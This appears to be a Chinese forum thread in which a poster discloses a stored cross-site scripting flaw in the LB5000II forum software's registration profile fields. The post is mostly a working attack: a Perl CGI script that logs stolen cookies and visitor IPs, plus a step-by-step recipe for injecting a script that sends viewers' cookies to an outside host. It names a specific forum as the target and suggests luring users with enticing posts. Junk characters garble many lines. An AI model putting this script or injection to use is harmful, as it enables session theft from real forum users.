雷傲跨站脚本漏洞收集用户cookie漏洞，适合与任何版本，任何系统

幸福的傻瓜

漏洞描述：
  LB5000II是国内流行的CGI程序之一，是在Ikonboard的基础之上改进的，目前最新
版本是LB5000II v20317b，可以http://www.leoboard.com下载。
  其注册模块未过滤用户资料   最高学历：职业状况：等注册信息
导致恶意用户可以通过伪造<s cript>alert(documents.ｃookie)</s cript>
进行攻击，进一步可以通过某中方式收集。测试通过
测试程序：
- Y" M" p- a, q; x/ ]  U' z  参考漏洞描述。
解决方案：
  对用户提交的资料进行过滤
   

请在s8s8论坛访问
http://www.leothreads.com/cgi-bin/profile.cgi?action=show&member=大刀队
那么你在s8s8.net 的cookie将被我所获取.
0 S/ u* b. |9 A9 Y# `; r9 ~#!/usr/bin/perl
#leo.cgi
$url="http://www.s8s8.net";;
$ H+ V" p* N% {( `( B* C4 ]$method=$ENV{"REQUEST_METHOD"};
8 l9 Y) d7 D: D4 t' @if(lc($method) eq "get"){$buffer=$ENV{"QUERY_STRING"};}
2 r# Z% S5 t4 G/ }0 T8 |0 O8 m$ Zelse{read(STDIN,$buffer,length($ENV{"CONTENT_LENGTH"}));}
3 D! m& l3 i/ l* w9 G$remote_addr=$ENV{"REMOTE_ADDR"};
1 o* Y- v0 t  T* d1 s+ [6 u$buffer=~tr/+/ /;
$buffer=~s/%([\dA-Fa-f0-9][\dA-Fa-f0-9])/pack("C",hex($1))/eg;
$buffer=$buffer."|$remote_addr\n";
open(FILE,">>leo.txt");
6 u+ W6 l+ @+ [print FILE $buffer;
close(FILE);                       
' ?/ \! a9 b; p6 {print "Location:$url\n\n";
# V: A* Z  [# W上面是我的cookie收集脚本
( N  y) X( d& h) i# p% c. P------------------------------------------------------------------------------
范例：以s8s8为例，感谢好友狩猎者 shocknet 帮助测试
  \! V0 d, d  @用大刀队登陆s8s8论坛，编辑个人资料，
/ x: T% U5 _# P7 N* |7 `8 L% c用记事本打开编辑网页
<option value="中专">中专</option>  这一项改成
6 s% r  _& @0 {7 R# ?: M<option value="<s cript>window.open('http://enter.3322.net/cgi-bin/info/leo.cgi?&#39;+documents.ｃookie)</s cript>">中专</option>   
# Y5 T5 i" e  k& Z
编辑<FORM action="profile.cgi" method=post name="creator" enctype="multipart/FORM-data">
1 @5 I! o" a2 `" i改为
<FORM action="http://www.leothreads.com/cgi-bin/profile.cgi"; method=post name="creator" enctype="multipart/FORM-data">
保存编辑的网页，用自己的页登陆，选“中专”一项，提交数据，
, ?2 Z* ^9 X  H1 R8 F, ^这样以后只要查看大刀队的资料的用户，那么查看者的cookie资料将被截获。
为了伪装的更好，可以在论坛发具有诱惑力的帖子连接，吸引人家去点击，
. H7 V% E) ]4 Q什么算诱惑力呢，自己发挥吧。
  ~: g9 j' Z) s+ v/ U

lostway

我连怎么设置超连接都不懂~~~汗~！能教教我吗？
（我指在贴上设置）

YES东

我们的论坛虽然是使用这个程序！但没这个问题！

幸福的傻瓜

那当染好了啊